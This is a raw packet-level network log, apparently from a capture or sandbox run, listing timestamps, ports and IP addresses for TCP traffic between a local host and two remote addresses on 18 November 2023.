Nov 18, 2023 10:02:25.952658892 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.952666998 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952682972 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952692032 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.952703953 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952721119 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952727079 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.952738047 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952754974 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952761889 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.952771902 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952789068 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952799082 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.952805996 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952816010 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952825069 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952841043 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952861071 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952874899 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.952877045 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952893019 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952899933 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.952909946 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952919006 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.952927113 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952935934 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952951908 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952969074 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952975988 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.952986956 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.952994108 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953005075 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953012943 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953013897 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953032970 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953047037 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953048944 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953066111 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953078032 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953083038 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953099012 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953108072 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953114986 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953134060 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953145027 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953151941 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953166962 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953177929 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953178883 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953186989 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953206062 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953222036 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953223944 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953247070 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953249931 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953259945 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953273058 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953288078 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953303099 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953315020 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953320026 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953336954 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953346014 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953347921 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953356028 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953372002 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953387976 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953398943 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953404903 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953419924 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953430891 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953435898 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953445911 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953461885 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953480959 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953485966 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953499079 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953517914 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953527927 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953532934 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953550100 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953567028 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953567028 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953586102 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953598976 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953602076 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953619003 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953628063 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953629017 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953645945 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953658104 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953676939 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953684092 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953694105 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953704119 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953711033 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953727007 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953728914 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953742981 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953758001 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953758955 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953775883 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953788996 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953793049 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953809023 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953825951 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953828096 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953843117 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953849077 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953860044 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953876972 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953886032 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953893900 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953911066 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953922033 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953927040 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953943014 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953962088 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953967094 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953979969 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.953993082 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.953996897 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954014063 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954025030 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954030037 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954046965 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954058886 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954062939 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954080105 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954090118 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954096079 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954113007 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954121113 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954129934 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954147100 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954159021 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954163074 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954179049 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954191923 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954195023 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954210997 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954222918 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954230070 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954252005 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954258919 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954269886 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954288960 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954296112 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954305887 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954322100 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954334021 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954339027 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954355955 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954368114 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954372883 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954390049 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954399109 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954408884 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954426050 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954437017 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.954442978 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:25.954468966 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:25.955820084 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.126895905 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:26.250888109 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.250916004 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251003981 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251023054 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251041889 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251060009 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251076937 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251082897 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251084089 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251095057 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251110077 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251120090 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251136065 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251137018 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251156092 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251173019 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251211882 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251211882 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251296997 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251315117 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251338959 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251358032 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251373053 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251388073 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251405001 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251437902 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251437902 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251545906 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251565933 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251584053 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251600027 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251619101 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251637936 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251637936 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251637936 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251662970 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251677990 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251679897 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251697063 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251713991 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251729965 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251746893 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251748085 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251748085 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251765013 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251781940 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251799107 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251804113 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251816034 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251822948 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251833916 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251852036 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251868010 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251872063 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251887083 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251904964 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251909018 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251923084 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251930952 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251940966 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251959085 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251969099 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.251976967 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.251993895 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252000093 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252019882 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252037048 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252043009 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252053022 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252070904 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252089024 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252105951 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252109051 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252109051 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252123117 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252139091 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252152920 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252157927 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252175093 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252191067 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252192020 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252209902 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252226114 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252238989 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252243042 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252249002 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252268076 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252286911 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252304077 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252316952 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252321005 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252337933 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252355099 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252367973 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252367973 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252371073 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252393961 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252412081 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252430916 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252430916 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252438068 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252454996 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252473116 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252497911 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252511978 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252511978 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252552986 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252572060 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252588034 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252604961 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252620935 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252625942 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252625942 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252638102 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252656937 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252674103 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252676010 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252693892 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252697945 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252712011 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252728939 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252734900 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252744913 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252762079 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252778053 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252779007 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252794981 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252811909 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252815962 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252827883 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252836943 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252846956 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252863884 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252882004 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252890110 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.252970934 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.252988100 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253005028 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253009081 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253009081 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253021002 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253037930 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253046989 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253055096 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253072977 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253084898 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253089905 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253108025 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253123999 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253140926 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253149033 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253149033 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253158092 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253175974 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253192902 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253210068 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253220081 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253220081 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253226995 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253254890 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253258944 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253272057 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253288984 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253307104 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253324032 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253326893 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253326893 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253340960 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253357887 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253376007 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253381014 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253392935 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253410101 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253426075 CET	80	49737	194.49.94.210	192.168.2.4
Nov 18, 2023 10:02:26.253434896 CET	49737	80	192.168.2.4	194.49.94.210
Nov 18, 2023 10:02:26.253434896 CET	49737	80	192.168.2.4	194.49.94.210
